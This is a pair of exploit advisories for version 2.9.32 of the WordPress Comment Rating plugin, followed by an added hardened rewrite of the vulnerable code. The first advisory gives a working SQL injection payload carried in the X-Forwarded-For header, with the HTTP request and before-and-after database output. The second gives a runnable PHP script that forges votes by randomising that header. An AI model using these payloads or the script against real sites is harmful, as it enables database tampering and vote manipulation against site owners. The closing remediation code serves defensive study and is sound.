# Exploit Title: WordPress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4

Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First, the client IP is taken from the HTTP_X_FORWARDED_FOR header, a value the client fully controls:
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}

Later, an UPDATE is built by string concatenation, without filtering or escaping that input:
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";

So let's take a look at the DB:

mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)

Now make an HTTP request with the injection in the X-Forwarded-For header:

GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive

The leading quote closes the ck_ips string literal, the rest of the header adds a second ck_ips assignment with our own WHERE clause, and the trailing # comments out the remainder of the original statement. The result:

mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)

Cheers

=======================================================================================

# Exploit Title: WordPress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4

Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First, the client IP is taken from the HTTP_X_FORWARDED_FOR header:
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}

Later, an UPDATE is built without filtering the input:
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";

Since the duplicate check only looks for the header value in the stored IP list, bypassing the vote limitation is just a matter of sending an X-Forwarded-For header and changing it on every request. A simple PoC in PHP:

<?php
define('HOST', 'http://localhost/wordpress/');
define('IDCOMMENT', 2);
define('VOTES', 10); // number of forged votes to send

$url = parse_url(HOST);
define('URL', $url['path'] . 'wp-content/plugins/comment-rating/ck-processkarma.php?id=' . IDCOMMENT . '&action=add&path=a&imgIndex=1_14_');

for ($i = 0; $i < VOTES; $i++) {
    lvlup();
}

function lvlup() {
    global $url;
    // A fresh random IPv4 literal in X-Forwarded-For never matches the stored ck_ips list,
    // so every request is counted as a new voter.
    $header  = "GET " . URL . " HTTP/1.1\r\n";
    $header .= "Host: " . $url['host'] . "\r\n";
    $header .= "Accept-Encoding: gzip, deflate\r\n";
    $header .= "X-Forwarded-For: " . long2ip(mt_rand(1, 0x7FFFFFFF)) . "\r\n";
    $header .= "Connection: close\r\n\r\n";

    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    // socket_connect() wants a dotted-quad address, not a hostname
    socket_connect($socket, gethostbyname($url['host']), 80);
    socket_write($socket, $header);
    socket_read($socket, 4096); // wait for the response so the vote is processed before we hang up
    socket_close($socket);
}
?>
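Both advisories come down to the same two lines: an attacker-controlled header is used as the voter's identity, and that identity is concatenated into SQL. As an added example that is not part of either advisory or of the plugin's own code, here is how the karma-update step could be written so that neither issue applies. It assumes the WordPress $wpdb API, the table layout shown in the mysql output above, and a hypothetical list of reverse proxies operated by the site owner; the request wiring at the bottom is likewise an assumption about how the handler derives its parameters.

```php
<?php
// Added example, not code from the Comment Rating plugin: a hardened rewrite of the
// vote-recording step of ck-processkarma.php. Assumes the WordPress $wpdb API and the
// table columns ck_comment_id, ck_ips, ck_rating_up, ck_rating_down.

/**
 * Return the client IP the application should trust.
 *
 * X-Forwarded-For is client-controlled unless a reverse proxy you run strips and
 * re-sets it. Only honour it when the TCP peer is one of those proxies, take the
 * hop that proxy appended (the last one), and reject anything that is not an IP literal.
 */
function ck_client_ip(array $server, array $trusted_proxies) {
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    $xff    = isset($server['HTTP_X_FORWARDED_FOR']) ? $server['HTTP_X_FORWARDED_FOR'] : '';

    if ($xff !== '' && in_array($remote, $trusted_proxies, true)) {
        $hops      = array_map('trim', explode(',', $xff));
        $candidate = end($hops); // hop appended by our own proxy
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    // Fall back to the socket peer, which cannot be forged by adding a header.
    return $remote;
}

/**
 * Record one vote. $direction becomes part of a column name, which prepare()
 * cannot quote, so it is whitelisted; every value goes through a placeholder.
 * Returns 'counted', 'duplicate', or false on invalid input / DB error.
 */
function ck_record_vote($wpdb, $comment_id, $direction, $ip) {
    $columns = array('up' => 'ck_rating_up', 'down' => 'ck_rating_down');
    if (!isset($columns[$direction])) {
        return false;
    }
    $column = $columns[$direction];
    $table  = $wpdb->prefix . 'comment_rating';

    $row = $wpdb->get_row(
        $wpdb->prepare("SELECT ck_ips FROM {$table} WHERE ck_comment_id = %d", $comment_id),
        ARRAY_A
    );
    if ($row === null) {
        return false;
    }

    // Exact-match the stored list; strstr() would treat 10.0.0.1 as already present
    // whenever 10.0.0.10 had voted, and vice versa.
    $seen = array_filter(explode(',', $row['ck_ips']));
    if (in_array($ip, $seen, true)) {
        return 'duplicate';
    }
    $seen[] = $ip;

    // %s is quoted and escaped by prepare(): a quote in the header value is stored as
    // data instead of terminating the literal. The counter is incremented in SQL so a
    // caller cannot pass an arbitrary $rating either.
    $ok = $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$table} SET {$column} = {$column} + 1, ck_ips = %s WHERE ck_comment_id = %d",
            implode(',', $seen),
            $comment_id
        )
    );
    return ($ok !== false) ? 'counted' : false;
}

// Wiring, as a handler might call it (assumed; the real plugin's parameter handling is
// not shown on this page). $direction must already be 'up' or 'down' here.
// $ip = ck_client_ip($_SERVER, array('127.0.0.1'));
// $result = ck_record_vote($wpdb, (int) $_GET['id'], $direction, $ip);
```

With ck_client_ip() the second PoC's random X-Forwarded-For values are ignored unless the request actually arrives from a listed proxy, so every vote from one host maps back to the same REMOTE_ADDR. Note that an IP-based limit is still a weak control on its own: users behind a shared NAT are lumped together and an attacker with many source addresses is not slowed down, so where the plugin's design allows it the vote should be tied to a logged-in user or a signed cookie rather than to an address.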